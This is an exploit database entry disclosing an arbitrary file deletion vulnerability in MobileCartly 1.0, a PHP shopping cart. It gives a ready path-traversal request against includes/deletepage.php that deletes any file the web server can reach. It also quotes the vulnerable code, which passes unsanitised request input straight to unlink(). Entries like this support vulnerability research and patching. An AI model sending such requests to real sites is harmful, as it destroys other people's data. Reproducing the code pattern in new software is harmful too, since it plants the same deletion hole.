EXPLOITS

MobileCartly 1.0 - Arbitrary File Deletion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2012-08-10  
date_updated: 2012-08-15  
verified: 1  
codes: OSVDB-85137  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt20500/screen-shot-2012-08-15-at-111202-am.png  
application_url: http://www.exploit-db.commobilecartly.zip  

raw file: 20398.txt  

# Exploit Title: MobileCartly 1.0 <= Arbitrary Delete Vulnerability
# Date: 09/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://mobilecartly.com/mobilecartly.zip
# Version: 1.0
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex : 	[MobileCartly 1.0]/includes/deletepage.php?deletepage=../[File]
# Code Page /includes/deletepage.php
# <?
#
# $page = "../pages/" . $_REQUEST['deletepage']; <<---XXX
#
# unlink($page); <<---XXX[Booooom]
#
#
# ?>